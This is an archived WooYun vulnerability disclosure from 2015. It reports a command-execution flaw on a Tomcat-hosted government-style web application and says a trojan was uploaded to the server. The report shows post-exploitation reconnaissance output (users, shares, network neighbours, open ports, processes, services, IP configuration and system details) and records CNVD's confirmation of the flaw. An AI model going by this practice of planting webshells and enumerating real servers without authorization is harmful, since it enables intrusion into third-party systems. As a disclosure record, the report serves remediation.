乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-17: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
地址**.**.**.**:8080/hszw/topic.action存在命令执行漏洞
直接上传木马到服务器
[*] 磁盘列表 [ C:D:E:F: ]D:\apache-tomcat-7.0.59\webapps\hszw\hszw\> net user\\ 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令运行完毕,但发生一个或多个错误。系统找不到指定的路径。D:\apache-tomcat-7.0.59\> net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 E$ E:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\Windows 远程管理 命令成功完成。D:\apache-tomcat-7.0.59\> net view服务器名称 注解-------------------------------------------------------------------------------\\HP \\VAIO \\W \\WIN-U5LD8O5487V \\WZL-THINK \\YTMSAOUT \\YTMSAWEB \\ZHANGGUODONG-PC \\ZXS 命令成功完成。D:\apache-tomcat-7.0.59\> netstat /ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 948 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 388 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 424 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 424 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 648 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 1028 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 1080 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 732 TCP **.**.**.**:49156 **.**.**.**:0 LISTENING 684 TCP **.**.**.**:3306 **.**.**.**:49161 ESTABLISHED 388 TCP **.**.**.**:3306 **.**.**.**:49162 ESTABLISHED 388 TCP **.**.**.**:3306 **.**.**.**:49163 ESTABLISHED 388 TCP **.**.**.**:3306 **.**.**.**:49164 ESTABLISHED 388 TCP **.**.**.**:3306 **.**.**.**:49165 ESTABLISHED 388 TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 424 TCP **.**.**.**:49161 **.**.**.**:3306 ESTABLISHED 424 TCP **.**.**.**:49162 **.**.**.**:3306 ESTABLISHED 424 TCP **.**.**.**:49163 **.**.**.**:3306 ESTABLISHED 424 TCP **.**.**.**:49164 **.**.**.**:3306 ESTABLISHED 424 TCP **.**.**.**:49165 **.**.**.**:3306 ESTABLISHED 424 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:8080 **.**.**.**:6930 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:6967 ESTABLISHED 424 TCP **.**.**.**:49412 **.**.**.**:80 ESTABLISHED 10456 TCP **.**.**.**:49754 **.**.**.**:139 ESTABLISHED 4 TCP **.**.**.**:63512 **.**.**.**:80 ESTABLISHED 1512 TCP **.**.**.**:64637 **.**.**.**:80 ESTABLISHED 1512 TCP [::]:135 [::]:0 LISTENING 948 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 648 TCP [::]:49153 [::]:0 LISTENING 1028 TCP [::]:49154 [::]:0 LISTENING 1080 TCP [::]:49155 [::]:0 LISTENING 732 TCP [::]:49156 [::]:0 LISTENING 684 UDP **.**.**.**:123 *:* 1160 UDP **.**.**.**:500 *:* 1080 UDP **.**.**.**:3600 *:* 1512 UDP **.**.**.**:4500 *:* 1080 UDP **.**.**.**:5355 *:* 1236 UDP **.**.**.**:64302 *:* 1512 UDP **.**.**.**:49531 *:* 5036 UDP **.**.**.**:59562 *:* 1512 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:123 *:* 1160 UDP [::]:500 *:* 1080 UDP [::]:5355 *:* 1236D:\apache-tomcat-7.0.59\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 528 暂缺 csrss.exe 592 暂缺 csrss.exe 640 暂缺 wininit.exe 648 暂缺 services.exe 684 暂缺 winlogon.exe 708 暂缺 lsass.exe 732 SamSs lsm.exe 740 暂缺 svchost.exe 888 DcomLaunch, PlugPlay svchost.exe 948 RpcSs svchost.exe 1028 Dhcp, EventLog, lmhosts svchost.exe 1068 gpsvc svchost.exe 1080 AeLookupSvc, BITS, dg597, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, RasMan, Schedule, seclogon, SENS, ShellHWDetection, Winmgmt, wuauserv SLsvc.exe 1108 slsvc svchost.exe 1160 EventSystem, LanmanWorkstation, netprofm, nsi, SstpSvc, W32Time svchost.exe 1208 hidserv, Netman, UxSms, WdiSystemHost svchost.exe 1236 CryptSvc, Dnscache, NlaSvc ZhuDongFangYu.exe 1268 ZhuDongFangYu svchost.exe 1464 BFE, DPS, MpsSvc spoolsv.exe 1896 Spooler inetinfo.exe 2044 IISADMIN mysqld.exe 388 MySQL tomcat7.exe 424 Tomcat svchost.exe 376 WerSvc taskeng.exe 2684 暂缺 dgservice.exe 2716 DGPNPSEV svchost.exe 3048 TapiSrv UI0Detect.exe 1544 UI0Detect taskeng.exe 4064 暂缺 dwm.exe 2068 暂缺 explorer.exe 3832 暂缺 360Tray.exe 1512 暂缺 SoftMgrLite.exe 644 暂缺 conime.exe 4348 暂缺 UI0Detect.exe 4700 暂缺 wlrmdr.exe 7592 暂缺 LogonUI.exe 6896 暂缺 xrcphesa.exe 5036 暂缺 360leakfixer.exe 8044 暂缺 DriverUpdate.exe 10456 暂缺 cmd.exe 12428 暂缺 tasklist.exe 14176 暂缺 WmiPrvSE.exe 14004 暂缺 D:\apache-tomcat-7.0.59\> net start已经启动以下 Windows 服务: Apache Tomcat 7.0 Tomcat Application Experience Background Intelligent Transfer Service Base Filtering Engine COM+ Event System Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager dgbased DGService PNP Service DHCP Client Diagnostic Policy Service Diagnostic System Host DNS Client Group Policy Client Human Interface Device Access IIS Admin Service IKE and AuthIP IPsec Keying Modules Interactive Services Detection IP Helper MySQL Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Print Spooler Remote Access Connection Manager Remote Procedure Call (RPC) Secondary Logon Secure Socket Tunneling Protocol Service Security Accounts Manager Server Shell Hardware Detection Software Licensing System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper Telephony User Profile Service Windows Error Reporting Service Windows Event Log Windows Firewall Windows Management Instrumentation Windows Time Windows Update Workstation 主动防御命令成功完成。D:\apache-tomcat-7.0.59\> ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : w 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接 4: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4 物理地址. . . . . . . . . . . . . : AC-16-2D-88-37-C7 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接 3: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3 物理地址. . . . . . . . . . . . . : AC-16-2D-88-37-C6 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接 2: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2 物理地址. . . . . . . . . . . . . : AC-16-2D-88-37-C5 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet 物理地址. . . . . . . . . . . . . : AC-16-2D-88-37-C4 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::e143:d7ab:40c5:b5fe%10(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 229381677 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1D-4B-45-39-AC-16-2D-88-37-C4 DNS 服务器 . . . . . . . . . . . : **.**.**.** **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 本地连接* 8: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{957F2F36-8D9D-41EB-939D-2755472025BA} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 9: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{C6A02684-1B24-4A05-876F-C480B6BE13BE} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 11: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{C6DFC7D0-6C7B-4E3A-82A7-D6CE15224751} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 12: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 02-00-54-55-4E-01 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:ddc0:992a:8db:2432:3f57:36de(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::8db:2432:3f57:36de%17(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS . . . . . . . : 已禁用隧道适配器 本地连接* 13: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : isatap.{F8C24282-D6CF-44CD-B3A7-D08342CA359C} 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是D:\apache-tomcat-7.0.59\> systeminfo主机名: WOS 名称: Microsoft? Windows Server? 2008 Enterprise OS 版本: 6.0.6002 Service Pack 2 Build 6002OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 92516-OEM-7502905-10173初始安装日期: 2015/7/30, 10:21:50系统启动时间: 2015/7/31, 10:28:02系统制造商: HP系统型号: ProLiant DL388p Gen8系统类型: X86-based PC处理器: 安装了 2 个处理器。 [01]: x64 Family 6 Model 45 Stepping 7 GenuineIntel ~2493 Mhz [02]: x64 Family 6 Model 45 Stepping 7 GenuineIntel ~2493 MhzBIOS 版本: HP P70, 2012/8/20Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 32,733 MB可用的物理内存: 29,167 MB页面文件: 最大值: 65,606 MB页面文件: 可用: 61,656 MB页面文件: 使用中: 3,950 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: 暂缺修补程序: 安装了 1 个修补程序。 [01]: KB955430网卡: 安装了 4 个 NIC。 [01]: Broadcom NetXtreme Gigabit Ethernet 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::e143:d7ab:40c5:b5fe [02]: Broadcom NetXtreme Gigabit Ethernet 连接名: 本地连接 2 状态: 媒体连接已中断 [03]: Broadcom NetXtreme Gigabit Ethernet 连接名: 本地连接 3 状态: 媒体连接已中断 [04]: Broadcom NetXtreme Gigabit Ethernet 连接名: 本地连接 4 状态: 媒体连接已中断D:\apache-tomcat-7.0.59\>
加强安全意识
危害等级:高
漏洞Rank:13
确认时间:2015-11-24 13:39
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
暂无
